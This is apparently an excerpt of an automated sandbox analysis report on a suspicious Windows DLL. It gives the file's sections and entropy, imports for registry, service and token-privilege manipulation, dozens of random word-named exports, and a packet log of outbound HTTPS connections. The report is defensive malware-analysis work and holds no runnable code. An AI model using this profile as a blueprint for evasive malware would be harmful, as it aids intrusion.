IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xaa00	0x564	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x251fd	0x20000	False	0.623756408691	data	6.31804757737	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.reloc	0x27000	0x1180	0x1200	False	0.823784722222	data	6.75515197561	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
advapi32.dll	GetTraceLoggerHandle, OpenServiceA, OpenProcessToken, QueryServiceConfigW, TraceMessage, RegisterTraceGuidsW, OpenSCManagerA, OpenSCManagerW, RegOpenKeyExA, GetTraceEnableLevel, LookupPrivilegeValueA, RegDeleteKeyA, OpenThreadToken, QueryServiceStatus, RegQueryValueExA, CloseServiceHandle, RegOpenKeyA, ReportEventW, RegSetValueExW, RegCreateKeyExW, OpenServiceW, ControlService, SetThreadToken, ImpersonateSelf, RegCreateKeyA, RevertToSelf, RegisterEventSourceW, RegSetValueA, StartServiceW, ChangeServiceConfigW, RegNotifyChangeKeyValue, ImpersonateLoggedOnUser, RegOpenKeyExW, DeregisterEventSource, RegCloseKey, RegSetValueExA, AdjustTokenPrivileges, GetTraceEnableFlags, UnregisterTraceGuids, RegQueryValueExW
cmutil.dll	CmRealloc, CmStrCpyAllocA, GetOSVersion, CmStrrchrA, CmMalloc, GetOSBuildNumber, CmStrtokA, GetOSMajorVersion, CmFree
comsnap.dll	DllGetClassObject
kernel32.dll	CloseHandle, CreateTimerQueueTimer, GetLastError, GetTickCount, RtlUnwind, lstrcmpA, FileTimeToSystemTime, DeleteFileW, lstrlenW, TlsFree, CreateEventA, RaiseException, IsBadWritePtr, FindNextFileA, GetTempPathA, FreeEnvironmentStringsW, ReadFile, GetSystemTime, HeapCreate, RegisterWaitForSingleObject, WaitForMultipleObjects, VirtualQuery, lstrlenA, GetProcessHeap, GetVersionExA, GetUserDefaultLCID, SetUnhandledExceptionFilter, DeleteCriticalSection, FileTimeToDosDateTime, LCMapStringW, InterlockedExchange, CreateSemaphoreA, LocalAlloc, IsBadStringPtrA, GetModuleFileNameW, FormatMessageW, InterlockedDecrement, GetOEMCP, HeapAlloc, WritePrivateProfileStringA, GetPrivateProfileStringA, SetStdHandle, CreateFileW, GetEnvironmentStrings, LoadLibraryA, RemoveDirectoryA, WriteConsoleW, CreateMutexA, GetFileSize, TlsSetValue, IsValidCodePage, GetModuleFileNameA, GlobalUnlock, VirtualAlloc, InitializeCriticalSection, FindNextFileW, LCMapStringA, FreeEnvironmentStringsA, PostQueuedCompletionStatus, GetEnvironmentStringsW, GetConsoleCP, UnmapViewOfFile, HeapReAlloc, GetComputerNameA, GetFullPathNameA, FindClose, GetFileAttributesW, MoveFileA, FindFirstFileW, GetACP, SearchPathA, GetDateFormatW, ReleaseMutex, GetDriveTypeA, SetFilePointer, SetCurrentDirectoryA, UnregisterWaitEx, GetVersion, GetCurrentThreadId, CreateDirectoryW, CreateEventW, GetConsoleMode, CreateProcessA, SetLastError, GetStdHandle, TlsAlloc, CreateThread, GetFullPathNameW, GlobalFree, GetCurrentProcess, GetThreadLocale, IsBadReadPtr, GetCurrentProcessId, CreateFileA, CreateDirectoryA, InterlockedIncrement, GetTimeFormatW, QueryPerformanceCounter, LocalLock, FindFirstFileA, CompareStringW, GetCurrentDirectoryA, CreateFileMappingA, GetTempPathW, GetCurrentThread, WideCharToMultiByte, GlobalLock, DeviceIoControl, LocalUnlock, TlsGetValue, MoveFileExA, GetStartupInfoA, GetLocaleInfoA, GetModuleHandleW, UnhandledExceptionFilter, Sleep, ReleaseSemaphore, SetEvent, ChangeTimerQueueTimer, LocalFree, QueryPerformanceFrequency, CreateTimerQueue, LoadLibraryExW, FileTimeToLocalFileTime, GetModuleHandleA, GetConsoleOutputCP, DeleteFileA, RemoveDirectoryW, TerminateProcess, WaitForSingleObject, CompareFileTime, GetVersionExW, EnterCriticalSection, CreateIoCompletionPort, GetSystemDirectoryA, HeapFree, GetFileTime, GetFileType, GetStringTypeW, OutputDebugStringA, WriteFile, GetCPInfo, LoadLibraryW, GetCurrentDirectoryW, SetCurrentDirectoryW, GetLocaleInfoW, GetCommandLineA, CompareStringA, DeleteTimerQueueTimer, VirtualFree, GetStringTypeA, GetFileAttributesA, GlobalAlloc, WriteConsoleA, LoadLibraryExA, FreeLibrary, VirtualProtect, MapViewOfFile, HeapDestroy, FlushFileBuffers, GetProcAddress, GetSystemDefaultLangID, DeleteTimerQueue, ExitProcess, GetQueuedCompletionStatus, SystemTimeToFileTime, lstrcpyA, SetHandleCount, LeaveCriticalSection, GetSystemInfo, MultiByteToWideChar
msdart.dll	UMSEnterCSWraper, MPDeleteCriticalSection, MpHeapAlloc, FXMemDetach, MpGetHeapHandle, MpHeapFree, MPInitializeCriticalSection, FXMemAttach
msvcp60.dll	?_Xran@std@@YAXXZ, ?_Xlen@std@@YAXXZ
msvcrt.dll	strchr, _itoa, _CxxThrowException, swprintf, isdigit, malloc, memcpy, strstr, wcscat, _ultow, _stat, wcschr, towupper, strlen, wcscmp, iswspace, _wsplitpath, _strdup, _initterm, _onexit, localtime, _wtol, wcslen, strcmp, strcpy, wcscpy, atoi, _strnicmp, qsort, _amsg_exit, strncat, realloc, _wcsnicmp, __dllonexit, wcspbrk, _wcsicmp, time, vsprintf, memset, _XcptFilter, wcsrchr, _timezone, strncmp, _stricmp, calloc, _wtoi, memmove, wcsncpy, _wasctime, printf, _ltow, sprintf, memcmp, atol, free, wcsstr, _vsnprintf, _purecall, ?terminate@@YAXXZ, __CxxFrameHandler
ntdll.dll	memcmp, wcsncpy, wcscmp, memset, _snprintf, memmove, wcscpy
ole32.dll	CoInitializeEx, CoTaskMemAlloc, CoGetMalloc, CreatePointerMoniker, CoTaskMemFree, CoTaskMemRealloc, CoInitialize, CoUninitialize, CoCreateInstance, CoGetClassObject
rpcrt4.dll	UuidToStringA, RpcBindingFree, RpcSsDestroyClientContext, RpcBindingFromStringBindingW, I_RpcExceptionFilter, NdrClientCall2, RpcStringFreeW, UuidCreate, RpcStringBindingComposeW
setupapi.dll	SetupDiEnumDeviceInterfaces, SetupDiDestroyDeviceInfoList, SetupDiGetDeviceInterfaceDetailA, SetupDiGetClassDevsA
shell32.dll	SHChangeNotify
user32.dll	LoadStringW, wsprintfA, MessageBoxA, CharUpperA, FindWindowA, MessageBoxW, CharUpperW, SendMessageA
wshext.dll	CreateIndirectData

Exports

Name	Ordinal	Address
Escargatoire	1	0x4011e2
Albigensian	2	0x4012c7
Repopulation	3	0x40154d
Pharisaism	4	0x401774
Unbroke	5	0x401955
Chloroprene	6	0x401f74
Electrodeposition	7	0x402708
Steigh	8	0x4028b2
Becoom	9	0x402bb5
Chymify	10	0x402d25
Lissotrichy	11	0x4031b0
Ovaliform	12	0x40362e
Unforbidding	13	0x40386b
Larunda	14	0x403922
Willowworm	15	0x403a00
Frontosquamosal	16	0x403b71
Cabuya	17	0x403d51
Hystrix	18	0x403e33
Mesaticephal	19	0x404012
Twinkly	20	0x4044df
Obdeltoid	21	0x404a80
Ebonize	22	0x404da9
DllUnregisterServer	23	0x40511d
Snaith	24	0x4053d6
Unorchestrated	25	0x40563d
Reflectionist	26	0x4056ed
Ruching	27	0x40578c
Evulse	28	0x405acc
Feck	29	0x405c73
Certifiably	30	0x405d33
Aphodius	31	0x4060e4
Anemonin	32	0x4068f0
Enchainment	33	0x4069f7
Outcrossing	34	0x406bc5
DllRegisterServer	35	0x406e54
Nonporous	36	0x406f3c
Thoracostracous	37	0x40702c
Myelitis	38	0x4070fc
Cockthrowing	39	0x407222
Bairnliness	40	0x407803
Menthaceous	41	0x407a47
Laceleaf	42	0x407b6a
Lauryl	43	0x407ea0
Anacleticum	44	0x407fb1
Epihyal	45	0x4084f5
Cotyliform	46	0x408cbf
Isocrat	47	0x408d80
Quindecemvir	48	0x409004
Quintillionth	49	0x4090c5
Tripetaloid	50	0x40927e
Voluptuously	51	0x409428
Epididymodeferentectomy	52	0x4094ab

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 21, 2021 08:14:33.947602987 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.948724985 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.950090885 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.950611115 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.951509953 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.952331066 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.990408897 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.990488052 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.991377115 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.991465092 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.992770910 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.993103027 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.993171930 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.993237972 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.993993998 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.994086027 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.994796991 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:33.994865894 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:33.999066114 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.000593901 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.001688957 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.002254963 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.014157057 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.018814087 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.041814089 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.042771101 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.042799950 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.042810917 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.042864084 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.042889118 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.043082952 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.044085979 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.044106960 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.044116974 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.044142962 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.044177055 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.044209003 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.044858932 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045167923 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045192957 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045207977 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045233011 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.045249939 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.045878887 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045900106 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045911074 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.045957088 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.045991898 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.056971073 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.058020115 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.058041096 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.058056116 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.058180094 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.058211088 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.061471939 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.062439919 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.062463999 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.062479019 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.062503099 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.062530994 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.067831039 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.080049038 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.080621958 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081089973 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081156015 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081237078 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081343889 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081423044 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081492901 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081649065 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.081773996 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.082014084 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.085618973 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.086002111 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.086239100 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.091387033 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.091790915 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.091888905 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.092657089 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.093369007 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.094162941 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.110814095 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.110946894 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.123065948 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.123167992 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.123265982 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.123332024 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.123780966 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124043941 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124161959 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124193907 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124222994 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124228954 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124241114 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124264956 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124273062 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124289989 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124305010 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124308109 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124320984 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124329090 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124341965 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.124350071 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124367952 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.124388933 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.125477076 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.125509024 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.125530005 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.125555038 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.125575066 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.126434088 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.126660109 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.126679897 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.126718998 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.126770020 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.127914906 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.127934933 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.128016949 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.128424883 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.128446102 CET	443	49753	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.128812075 CET	443	49752	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.128873110 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.129066944 CET	49753	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.129122019 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.129138947 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.129173040 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.129192114 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.129507065 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.129534006 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.130410910 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.130430937 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.130506992 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.131627083 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.131648064 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.131665945 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.131700039 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.131710052 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.131755114 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.132889032 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.132910013 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.132952929 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.132968903 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.134104013 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.134140015 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.134155989 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.134196043 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.134207964 CET	443	49754	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.134226084 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.134279013 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.134284973 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.134577990 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.134635925 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.135345936 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.135363102 CET	443	49750	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.135421038 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.136127949 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.136168957 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.136198997 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.136626005 CET	443	49755	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.136684895 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.141212940 CET	49752	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.144303083 CET	49755	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.147938013 CET	49754	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.148052931 CET	49750	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.153704882 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.153732061 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.153789043 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.153825045 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.166071892 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.166104078 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.166173935 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.166199923 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.166951895 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.166974068 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167005062 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167027950 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.167028904 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167047024 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167062998 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167104006 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.167110920 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.167113066 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167130947 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.167154074 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.167172909 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.168384075 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.168405056 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.168462038 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.169603109 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.169624090 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.169687033 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.170839071 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.170864105 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.170921087 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.170978069 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.172086000 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.172110081 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.172171116 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.173352003 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.173378944 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.173439980 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.173454046 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.174559116 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.174581051 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.174635887 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.175781012 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.175807953 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.175852060 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.175883055 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.176990986 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.177017927 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.177032948 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.177052975 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.177064896 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.177087069 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.177120924 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.178275108 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.178302050 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.178344965 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.178365946 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.179486990 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.179516077 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.179562092 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.179599047 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.180761099 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.180830956 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.181958914 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.181983948 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.182044983 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.183170080 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.183198929 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.183242083 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.183267117 CET	49751	443	192.168.2.4	151.101.1.44
Jan 21, 2021 08:14:34.184422016 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.184444904 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.184461117 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.184477091 CET	443	49751	151.101.1.44	192.168.2.4
Jan 21, 2021 08:14:34.184501886 CET	49751	443	192.168.2.4	151.101.1.44
